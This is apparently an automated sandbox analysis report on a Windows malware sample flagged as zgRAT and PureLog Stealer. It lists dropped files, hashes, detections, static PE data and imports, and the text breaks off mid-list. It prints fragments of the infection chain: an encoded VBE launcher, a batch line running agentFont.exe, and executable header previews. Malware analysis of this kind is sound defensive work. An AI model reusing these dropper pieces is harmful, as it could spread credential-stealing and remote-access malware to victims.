                                                                                  SHA-512:BAAF2B8C3B81FBDF9D0CE9A116E7F34755A8B21050F0D7ECF2832D802185EBC123CF7E856D1D611FDC91074AD2F0665676D5A38943228F872F2DAC2DAF3211BF
                                                                                  Malicious:false
                                                                                  Preview:xtwO2jmFhsY109hN08FHee95KxYghWa7s5hKgEGxit9uvWCDw2c27OeSu0EEKGiKRaJ4bWqw1RjufOKxuVto4iAebOap9CncKzcUNIlZLqApotxfqRTzW3QtZpdN6AwzoHjpvzjmuTdNhUzrb59ssyFRit5ioXdK3KBhKHt1rrECaCME0wwABDH0BSGC4B8W0SUXTRgTLHBBtD1gg0s1lcJ0DLf1Aq7qssMIszviPcz3CFH8bkgDSGuXIeTIvoSeKUSA0syrEKlJnQx7EgaaK3Xl7y9NfnwlJUsrxGHsvy8Iflu2qWEPO2TR7qDCtkMbXA9ShGK7YsoW4PGVEGhIjhWRAbuGDF8LlhvembVkMG0fO7Wskr7mDD20nsRFVD4StduXeltmv66cq1DDFBfVHWIio414JPOILhwuM9O97V1GGZJwpOATiiKWVMsjtzcfsyRJES0FxgYwfBbOvEP5P4kmWZZAQoPH2VXSIAsWX4gBKY1TueyokhQxOowo20zIQQ4JnJGuW2iUYic8hGPv0khVEkEeODegFXu3dsplYDSs86ZpMxHvlDRqtjEDFlgTXBOBxifzbnXxSzWILYSa6t5BFEK3nlgwh8U7rX2nSRU7peX4N62qTGXoFN5tXlLzHlQUeYaxgoHoZ8VlrQqrtzcakq2ecJPrGe0EODZyfEKp8tPH1UCH4eGSJztyg6VXZZh4IRWn01Looxc1avmHHIxmXi4YUlSjtxQiLU9j7YQCSbnWX1XvTNQQm5hkW8TPjl51g3qGwCKs1uT64iBcOhQgh96QxYN9EBdrgwzeLQ8QDhY1mlpy61ABVZTh6ZTXzKn0RmZIthQ7i9c9kEnMtYCNAbVHcRhv7la23ikALgFZkCcV6U72vGnbIaz0QSqbAfA6jkGBenAMTnn88AKIUp9089tdsut30nZFCfwVN5XIGaHew11PHiGUfJ8k0mTu4HWpOi5cOz4ZR1uh1P

                                                                                  C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kg................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........................P............................................0..........(.... ........8........E....*.......N.......8%...*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E................k...*.......8.......... ....~....{....9....& ....8........~....(Z...~....(^... ....<~... ....~....{....:....& ....8x...~....:`... ....8d...~....(R... .... .... ....s....~....(V....... ....~

                                                                                  C:\mshypercomponentSavesdll\1668b549825c2a

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (318), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):318
                                                                                  Entropy (8bit):5.830040925012662
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:DEm6zjXzvlZu2AXgB1aYUwRr2VuAyr9oV5tMZrrHhhv/Hvg8J4An:x6zLGv01tEuPr9oV50B/PgS4An
                                                                                  MD5:4A0C361FAE9E6BC63378B6A485AB2A22
                                                                                  SHA1:93D52E637449846BE7E8AD7A55136455746C9B5F
                                                                                  SHA-256:9CFF5E2E813993389E131F043536EE78BE8BAF2E3AD253BDDCB2B3E00218ACF6
                                                                                  SHA-512:EB33CB5CD6BFBB74B93814AEF3E70DBF5E21D9CA86B97413AD49FF8AA2573AA1ED9AD20AB7A1C8FD24BD5A2383C32FD893DC882126AABE45384C45DA77FF12A5
                                                                                  Malicious:false
                                                                                  Preview:3uqdu4jYoGGFuGwDO4t9OtJ91W73jocTWYvR6SIM2Yo1BJzN7E8JdFEKlqmY6pyAnwsVUeH6vgGzER8rhu5fqTzQUlqPpuQNknNObd2d6BX69OFTr50MtTUU6bBty1QAQ3PaEuQD1cjo52RFfWiu4DdRT3S9cJpEvWqG8pP7pxVRtqZDK5ObTgGMZ8HKcQkswe3iMLH0HkFHsLhmeOzh4NuOQdq9hEfYMmePx018yXUtb9dObfqNbDxjtoStfHSCFq5FrSynX0th3BxQ9ciCXR6Iz5fJhIdqESnuEYgJqC0kUQps1CtCjQoyuwQvwp

                                                                                  C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):81
                                                                                  Entropy (8bit):5.1635017002285215
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:o3gACjQ8Y69AUbFRiqWyAJAeJqbRNf5UCAn:owACjvY+AUJRWyA8Nf5Kn
                                                                                  MD5:7318BE9B65C2BF66CB3E8FF640112F84
                                                                                  SHA1:D6BE0AD9E53C30D1EC08CF221AEA38AAA9B3D03A
                                                                                  SHA-256:946525ADEA7B1163EF9801B9CED0AF00096159E968C3CCCF3FE9F85003994B2B
                                                                                  SHA-512:8458BE178B0943F95DF99BF70ADD5F1A8BE1727B12B387CB38F3770145401E06E4D3733BC954EAA149054BF3F360B7B647CDF153C2CAAABD9736286FC6ACD0F1
                                                                                  Malicious:false
                                                                                  Preview:%hRb%%ABhrVuBYExzWT%..%qAw%"C:\mshypercomponentSavesdll/agentFont.exe"%cfZTqIsSp%

                                                                                  C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kg................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........................P............................................0..........(.... ........8........E....*.......N.......8%...*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E................k...*.......8.......... ....~....{....9....& ....8........~....(Z...~....(^... ....<~... ....~....{....:....& ....8x...~....:`... ....8d...~....(R... .... .... ....s....~....(V....... ....~

                                                                                  C:\mshypercomponentSavesdll\agentFont.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kg................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........................P............................................0..........(.... ........8........E....*.......N.......8%...*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E................k...*.......8.......... ....~....{....9....& ....8........~....(Z...~....(^... ....<~... ....~....{....:....& ....8x...~....:`... ....8d...~....(R... .... .... ....s....~....(V....... ....~

                                                                                  C:\mshypercomponentSavesdll\e6dd04281f4893

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (761), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):761
                                                                                  Entropy (8bit):5.9078229661703014
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:bU5qgG29xdYRhqnk9ER6hYtp9Nl6xNiQjyRUkYSPmt28HgWlmy04BODy9/eS7OpY:m9x6RJYgxNMuZHRlm1lDO56pYt
                                                                                  MD5:068D08551BBE28F6EF65E0ABC038BB67
                                                                                  SHA1:058C3357928A436FDD0B7EBDE8304FC14CB746F2
                                                                                  SHA-256:65EE79EFDAEF1FF09CAC659D491D7648EA9C17D49C5F411BEE975B91F2F58916
                                                                                  SHA-512:109890238E2122EC23BDFD2B5A45A0445A0454505C72BB6B7D3353A6DBF92E21B5D51A672C4456BDDA671EFB1F90EF78A608E244EEE522E8B71214DF16F4C454
                                                                                  Malicious:false
                                                                                  Preview:LpjUgVQ0rvj1aWSqC9yLiI4486hbTyDIUbFjqlTNZm6TEtKNPjcLsrMCvoWjyzg2sbh9RsAbqlw6Ll0PvUMuW1amOCyBOtYjFEknLK5gjBfH5Q0JxHxenwg0A5vO38M6NM0HANDlYpLUWTq7MpNH546TiumQZrnkzi3sZtJkDMG8lLerOxBOuFATQhiQlwMrBkfxZ8idgnDtx8rWP4ClpY0tikc1K29R9Y6BqrSPPisHCQfR0LAqukCmuvOyfqTnnwtZCqqilwWGqsrRFKB81ShZWTR4cetjOEdPhGPJfbF7O56BD7sVoVvVOUCsZwGGCw2lObu952daMkKbXP1fwY53TIBMDgusV84bDUwlMsZw2VIoKlVK5lUo18SGah6YIuEOpsXCcPSD8IB79WCcLkxtoQjECpKpwBoIQ49bNTrpTRps7UHEedNi6UjZIS9wEmQ7e3qEXlO12IaWk0HriGKTyFL6UjS4U4lqBsOEoCr3PVpy4NzSLRO7c6JYruuxSUh7guV2mDDfZREcaXCHuAtCqnNEjzW3S3k4yrRJ16pHOsiL2q8TsmDSkfR3gRTxqJNgqJosG2PxUly8FCL20DLpzRTSaXmkn1bEeBetBPMzWQ89qTyeFa6n8hrZzVStQpJcKtdDic0l0VTjTUlHjIeN4xF6UF3q6djrGfz6zu5njVxmOIFftLJHK6hWogtciKoWwmcyepRyM1nj9dsM9Y6uUcgJ7cSSBcFYra0mpRAE4U4TT8WLygdJO

                                                                                  C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):212
                                                                                  Entropy (8bit):5.711197580899429
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:GUwqK+NkLzWbHnPv7qK+NkLzWHOuynCWHLjEfWs:GlMCzWLnP/MCzWurCWHLQf1
                                                                                  MD5:06FA0952379DC4DB1439AF29A13D89BE
                                                                                  SHA1:A36AF1795B7948305940D6542D35F6D6DB038E6A
                                                                                  SHA-256:CFE1D4E4F8C609281567BCBA5CC5117FA957D53721B817F979092DEC7FC44852
                                                                                  SHA-512:A4E549A142C2763C9AA2650D65A2577EE92BB63A133D10E0B3FE6BCE3F43DD7230D5D0FC711A5DA84F41EAD8EC34557940659CF7C773A9BDADA3933812F285BF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  Preview:#@~^uwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.k4?4+sscIEU~rZlzsd4X2.D1W:aW.nxD?C\./[s^zz8WoUjwx0i3lAwR8lOEBPT~,Wl^/nZDwAAA==^#~@.

                                                                                  \Device\Null

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):502
                                                                                  Entropy (8bit):4.617849230514524
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:PQ5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:6dUOAokItULVDv
                                                                                  MD5:26EAE6FEED7DAF2C06D3CCABF837F597
                                                                                  SHA1:2F0BAD84BE1209EDAFF7615FDB240272019AD98A
                                                                                  SHA-256:230CF49794E5B27AB9828A56B384D85EB8D2AE5D465695D822D89778B53C319B
                                                                                  SHA-512:0C8E870DEBDDEAB3E3B71BBA23E63F49307A2D33990D9BAF850DF0660B0AB16EC61F90191B4C71FCA3787B0CB3BCDAE9C0DDAC04756800CC7E5A0B30D008E141
                                                                                  Malicious:false
                                                                                  Preview:..Pinging 960781 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                  Entropy (8bit):7.858360008225366
                                                                                  TrID:
                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:QH67JSdZWl.exe
                                                                                  File size:1'898'695 bytes
                                                                                  MD5:c8228b107dfad48c1a7de8147fa1f6e4
                                                                                  SHA1:7f6d1d3c48d891cccc4b0dd57504db216ac681a8
                                                                                  SHA256:8d0c8954abeaa3c75c922544e9798171de09868a3a1f9300e07465672ada3da4
                                                                                  SHA512:6bf0be5fab599f1e4380353d438855688602287d3a9c8904ffc6b6dfa63987658689e5cb9d14d1dc54fa0b4ca9c6979936b9014eb07b5940c4913930d06cdedd
                                                                                  SSDEEP:49152:ac6VI9Ja0rGCSO0uUUhMtuGTiWun+u2a5auBPLpp/W:94ILTpS5uatuGTHun+u2urp/W
                                                                                  TLSH:95950209E7E808FCE4B7B578DAA24902E7763C4E0771D68F13A456661F273909D3E722
                                                                                  File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......{...?..W?..W?..W..(W7..W..*W...W..+W2..W/.$W=..W/..V5..W/..V-..W/..V...W6.ZW6..W6.^W=..W6.JW8..W?..W...Wt..V...Wt..V>..Wt.&W>..

                                                                                  File Icon

                                                                                  Icon Hash:90cececece8e8eb0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x1400327e0
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x140000000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x676A81F5 [Tue Dec 24 09:42:13 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:2
                                                                                  File Version Major:5
                                                                                  File Version Minor:2
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:2
                                                                                  Import Hash:e3fd64aa4446c9293cbc88d0f6cebf06

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  dec eax
                                                                                  sub esp, 28h
                                                                                  call 00007F409CB13BB8h
                                                                                  dec eax
                                                                                  add esp, 28h
                                                                                  jmp 00007F409CB1343Fh
                                                                                  int3
                                                                                  int3
                                                                                  dec eax
                                                                                  mov eax, esp
                                                                                  dec eax
                                                                                  mov dword ptr [eax+08h], ebx
                                                                                  dec eax
                                                                                  mov dword ptr [eax+10h], ebp
                                                                                  dec eax
                                                                                  mov dword ptr [eax+18h], esi
                                                                                  dec eax
                                                                                  mov dword ptr [eax+20h], edi
                                                                                  inc ecx
                                                                                  push esi
                                                                                  dec eax
                                                                                  sub esp, 20h
                                                                                  dec ebp
                                                                                  mov edx, dword ptr [ecx+38h]
                                                                                  dec eax
                                                                                  mov esi, edx
                                                                                  dec ebp
                                                                                  mov esi, eax
                                                                                  dec eax
                                                                                  mov ebp, ecx
                                                                                  dec ecx
                                                                                  mov edx, ecx
                                                                                  dec eax
                                                                                  mov ecx, esi
                                                                                  dec ecx
                                                                                  mov edi, ecx
                                                                                  inc ecx
                                                                                  mov ebx, dword ptr [edx]
                                                                                  dec eax
                                                                                  shl ebx, 04h
                                                                                  dec ecx
                                                                                  add ebx, edx
                                                                                  dec esp
                                                                                  lea eax, dword ptr [ebx+04h]
                                                                                  call 00007F409CB12A13h
                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                  and al, 66h
                                                                                  neg al
                                                                                  mov eax, 00000001h
                                                                                  sbb edx, edx
                                                                                  neg edx
                                                                                  add edx, eax
                                                                                  test dword ptr [ebx+04h], edx
                                                                                  je 00007F409CB135D3h
                                                                                  dec esp
                                                                                  mov ecx, edi
                                                                                  dec ebp
                                                                                  mov eax, esi
                                                                                  dec eax
                                                                                  mov edx, esi
                                                                                  dec eax
                                                                                  mov ecx, ebp
                                                                                  call 00007F409CB14B37h
                                                                                  dec eax
                                                                                  mov ebx, dword ptr [esp+30h]
                                                                                  dec eax
                                                                                  mov ebp, dword ptr [esp+38h]
                                                                                  dec eax
                                                                                  mov esi, dword ptr [esp+40h]
                                                                                  dec eax
                                                                                  mov edi, dword ptr [esp+48h]
                                                                                  dec eax
                                                                                  add esp, 20h
                                                                                  inc ecx
                                                                                  pop esi
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  dec eax
                                                                                  sub esp, 48h
                                                                                  dec eax
                                                                                  lea ecx, dword ptr [esp+20h]
                                                                                  call 00007F409CB01C63h
                                                                                  dec eax
                                                                                  lea edx, dword ptr [00025E0Fh]
                                                                                  dec eax
                                                                                  lea ecx, dword ptr [esp+20h]
                                                                                  call 00007F409CB13D4Ah
                                                                                  int3
                                                                                  jmp 00007F409CB1785Ch
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x598f00x34.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x599240x50.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x6f0000x46e3.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x30d8.pdata
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000x964.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x534700x54.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x536800x28.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b1a00x140.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x480000x518.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588840x120.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x4637e0x464002d75b6208f53f098cd697a3796359288False0.5381971474644128data6.476135798896648IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x480000x12a4c0x12c0018f7a8933dfad9219b4ddc437f39d39fFalse0.4498697916666667data5.263488930105173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x5b0000xe81c0x1a00afb3f158e6601be588ee0ec88917fdd1False0.28260216346153844data3.250809205040315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .pdata0x6a0000x30d80x3200d69553281fdb2b3c5212f4c1f7e65c01False0.487734375data5.5447729633031315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .didat0x6e0000x3680x4009d64d4d9c61f860eed9f809474f3e3d6False0.2568359375data3.016152519023592IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x6f0000x46e30x4800ae376172c8caea26837114196adb9e6bFalse0.5884874131944444data6.070664574402543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x740000x9640xa00423b61d133b6720c4ce879131914e12aFalse0.528125data5.335617278018671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  PNG0x6f4c40x966PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0045719035743974
                                                                                  PNG0x6fe2c0x123fPNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9700278312995076
                                                                                  RT_DIALOG0x7106c0x286dataEnglishUnited States0.5092879256965944
                                                                                  RT_DIALOG0x712f40x13adataEnglishUnited States0.60828025477707
                                                                                  RT_DIALOG0x714300xecdataEnglishUnited States0.6991525423728814
                                                                                  RT_DIALOG0x7151c0x12edataEnglishUnited States0.5927152317880795
                                                                                  RT_DIALOG0x7164c0x338dataEnglishUnited States0.45145631067961167
                                                                                  RT_DIALOG0x719840x252dataEnglishUnited States0.5757575757575758
                                                                                  RT_STRING0x71bd80x1eadataEnglishUnited States0.3877551020408163
                                                                                  RT_STRING0x71dc40x1ccdataEnglishUnited States0.4282608695652174
                                                                                  RT_STRING0x71f900x1b8dataEnglishUnited States0.45681818181818185
                                                                                  RT_STRING0x721480x146dataEnglishUnited States0.5153374233128835
                                                                                  RT_STRING0x722900x46cdataEnglishUnited States0.3454063604240283
                                                                                  RT_STRING0x726fc0x166dataEnglishUnited States0.49162011173184356
                                                                                  RT_STRING0x728640x152dataEnglishUnited States0.5059171597633136
                                                                                  RT_STRING0x729b80x10adataEnglishUnited States0.49624060150375937
                                                                                  RT_STRING0x72ac40xbcdataEnglishUnited States0.6329787234042553
                                                                                  RT_STRING0x72b800x1c0dataEnglishUnited States0.5178571428571429
                                                                                  RT_STRING0x72d400x250dataEnglishUnited States0.44256756756756754
                                                                                  RT_MANIFEST0x72f900x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                  Imports

                                                                                  DLLImport
                                                                                  KERNEL32.dllGetLastError, GetOverlappedResult, WaitForSingleObject, WriteFile, ReadFile, CloseHandle, ConnectNamedPipe, DisconnectNamedPipe, PeekNamedPipe, CreateEventW, CreateFileW, CreateNamedPipeW, WaitNamedPipeW, LocalFree, SetLastError, FormatMessageW, DeviceIoControl, SetFileTime, RemoveDirectoryW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, GetCurrentProcess, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, SystemTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, 